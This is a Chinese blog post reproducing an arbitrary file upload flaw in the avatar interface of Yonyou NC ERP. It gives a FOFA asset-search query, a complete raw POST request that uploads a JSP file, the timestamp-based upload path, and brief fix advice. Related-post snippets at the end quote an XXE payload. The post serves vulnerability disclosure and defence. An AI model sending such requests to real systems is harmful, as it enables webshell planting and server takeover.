用友NC avatar接口文件上传漏洞

已于 2024-04-18 11:22:47 修改
阅读量609 收藏 5
点赞数 7
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-04-18 11:18:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/137913219
版权

产品简介

用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。

漏洞介绍

用友 NC avatar接口处存在任意文件上传漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

资产测绘

FOFA:app=“用友-UFIDA-NC”

漏洞复现

POST /uapim/upload/avatar?usercode=1&fileType=jsp HTTP/1.1
Host: 172.21.1.139:8084
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEXmnamw5gVZG9KAQ
User-Agent: Mozilla/5.0 

------WebKitFormBoundaryEXmnamw5gVZG9KAQ
Content-Disposition: form-data; name="file"; filename="12.jsp"
Content-Type: application/octet-stream

hello ^^
------WebKitFormBoundaryEXmnamw5gVZG9KAQ--

在这里插入图片描述
文件上传路径
/uapim/static/pages/photo/1/1.{{timestamp}}.jsp
文件名为当前上传文件的时间戳
可以通过编写脚本爆破获取
在这里插入图片描述
在这里插入图片描述

修复建议

1、升级到安全版本
2、如非必要,禁止公网访问该系统。
3、设置白名单访问。

用友NC-Cloud全版本任意文件上传
初岄的博客
10-20 620
用友NC-Cloud最近爆出存在全版本任意文件上传漏洞的问题。现在已经确认了这个漏洞可以被攻击者利用,目前找不到此漏洞适用的最低版本。攻击者可以通过该漏洞将任意文件上传至服务器,并以此将webshell上传至服务器,从而获得服务器的命令执行权限。
FineCMS任意头像上传漏洞复现:文件的四次上传
Miracle_ze的博客
08-16 1770
1、第一次绕过代码没有文件再次检测,采用传包含文件夹的压缩包绕过或使用时间竞争漏洞绕过2、第二个绕过代码添加了递归对文件夹再次检测,但由于没有间竞争漏洞绕过问题。使用间竞争漏洞绕过3、第三次绕过代码进行随机命名文件无法猜文件名间竞争漏洞绕过失效,但是可以采用解压一半报错保存php文件4、第四次绕过代码对报错保留的文件进行了递归删除,但是我们可以欺骗系统将解码的文件判定为上级目录文件规避了递归在当前目录下是所有检测。其实这种漏洞补一处出现处,要从根本解决。.........
用友漏洞php,用友NC任意文件上传漏洞复现
weixin_29786123的博客
03-29 2786
0x00 事件描述用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友NC 为C/S 架构,使用JAVA编程语言开发,客户端可直接使用UClient,服务端接口为HTTP。用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏...
漏洞复现】用友NC——文件上传漏洞
weixin_54799594的博客
07-16 1498
漏洞复现过程记录
VAuditDemo文件漏洞
最新发布
YhMjQx的博客
08-20 1218
VAuditDemo中存在首页文件包含漏洞以及avatar的任意文件读取漏洞,此漏洞被利用就可以读取全站源码,从而黑盒变白盒,渗透变审计
关于上传漏洞以及NC提交
weixin_34227447的博客
08-09 331
我们可以利用的存在上传漏洞要求:上传文件路径可自己定义,或者文件名可定义。上传文件路径可自己定义:也就是为什么我们在抓包改包的时候要将保存上传文件的路径改为pic/123.asp空格,然后将之前上传没成功的123.asp文件名改为123.jpg,然后再用UltraEdit-32将空格改为00(具体过程请自行Google)。我们之前改过的包,上传路径变为了pic/123.asp...
半夜睡不着起来看看题 文件上传Avatar Uploader 1以及CVE-2018-18086漏洞复现
helloKittywz的博客
06-08 390
半夜睡不着起来做做文件上传,在半夜还是收获了一些,首先看看buuctf的1这个题,前面直接登录就行了。文件上传真的难上传!!!进去过后就是正常的文件上传的操作,但是它也提示,只能上传png格式的图片。然后抓包进行操作,进行各种各样的绕过,我以为它是我上传正常的png格式的图片还是对我说请上传png图片,我就有点疑惑了,正常的图片怎么也是这样,那它对哪进行了检查,我试了很多中方法,前面我一来我就用了那个数据流::$data这个来进行处理的操作,然后我重新看了一下靶机时间。
漏洞复现-用友NC任意文件上传漏洞(附漏洞检测脚本)
jjjj1029056414的博客
12-10 952
漏洞复现-用友NC任意文件上传漏洞,附带自己写的poc脚本
layui 富文本图片上传接口与普通按钮 文件上传接口的例子
10-16
在本文中,我们将探讨如何在layui框架中实现富文本图片上传接口以及普通按钮触发的文件上传功能。layui是一款轻量级的前端组件库,它提供了丰富的UI组件,包括表单、表格、弹窗等,非常适合用于快速构建页面。在...
Django后端分离 使用element-ui文件上传方式
12-17
在本文中,我们将探讨如何在Django后端分离的架构中使用Element-UI进行文件上传。Element-UI是一个基于Vue.js的组件库,提供了一系列美观的界面元素,其中包括文件上传功能。以下是一些关键知识点: 1. **Element-...
【HW必备】用友NC-Cloud存在17处漏洞合集
wananxuexihu的博客
06-24 1793
漏洞挖掘是指通过分析软件、系统或网络中存在的安全漏洞来发现并利用这些漏洞漏洞挖掘是信息安全领域的一项重要工作,可以帮助企业和组织提高系统的安全性,避免黑客攻击和数据泄露。漏洞挖掘的流程一般可以概括为以下几个步骤:确定目标:确定要挖掘的软件或系统。这可能是一个应用程序、操作系统、网络设备或其他系统。收集信息:收集有关目标的信息,包括架构、协议、版本和配置等。这些信息可以通过互联网搜索、手动扫描、自动化工具和其他途径获得。分析漏洞:通过手动和自动化技术进行漏洞分析,识别潜在的漏洞类型和攻击面。
最新0day!!用友U8-Cloud UploadFile接口存在任意文件读取漏洞
weixin_43167326的博客
04-02 723
U8 cloud 聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。该系统存在任何文件读取漏洞
[CSAWQual 2019]Web_Unagi XXE漏洞 [HarekazeCTF2019]Avatar Uploader 1 finfo_file和getimagesize
scrawman的博客
01-27 3003
[CSAWQual 2019]Web_Unagi 看提示有告诉你xml的格式 <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>bob</username> <password>passwd2</passwor
漏洞复现--用友NC accept.jsp任意文件上传
qq_53003652的博客
11-07 789
用友NC是大型企业管理与电子商务平台,帮助企业实现管理转型升级全面从以产品为中心转向以客户为中心(C2B);从流程驱动转向数据驱动(DDE);从延时运行转为实时运行(RTE);从领导指挥到员工创新(E2M)。用友NC accept.jsp处存在任意文件上传漏洞,攻击者通过漏洞可以获取网站权限,导致服务器失陷。上传成功,并且成功解析,可上传免杀马获得服务器权限。访问/test.jsp。
用友filereceiveservlet-fileupload-CNVD-2023-85593
qq_36334672的博客
01-25 580
用友NC6.5。
用友全版本任意文件上传漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-26 2204
可以使用安全的文件验证机制,例如校验文件的魔术字节、文件头信息、文件结尾等,以确保上传的文件是预期的有效文件,并阻止上传恶意文件。限制文件上传:通过限制用户上传文件的类型、大小和目标路径,可以有效减少任意文件上传漏洞的风险。安全教育和培训:对系统管理员和用户进行安全教育和培训,提高其安全意识,让他们了解常见的安全威胁和最佳实践,以便正确地使用系统和应对潜在威胁。安全审计和监控:实施安全审计和监控机制,定期检查系统日志、访问日志和上传文件日志,及时发现异常活动和潜在的攻击行为。利用此漏洞需要俩段poc。
xray扫描器的使用 (长亭科技公司创造)
yyj1781572的博客
11-27 9146
xray扫描器的使用 xray是一款可以使用HTTP/HTTPS代理进行被动扫描的安全工具
Arbitrary file upload vulnerability
Summer's blog
05-13 3231
admin login required. Under the template interface in the administrator interface, upload a normal file 1.txt burp intercept request package modify the file name to 1.jsp or any other suffix. Includin...
文件上传漏洞黑白名单
08-30
文件上传漏洞是指攻击者利用网站或应用程序的文件上传功能来上传恶意文件或脚本,从而执行恶意操作。为了防止文件上传漏洞,可以使用黑白名单机制。 黑名单机制是指禁止上传特定文件类型或特定文件名的文件。通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值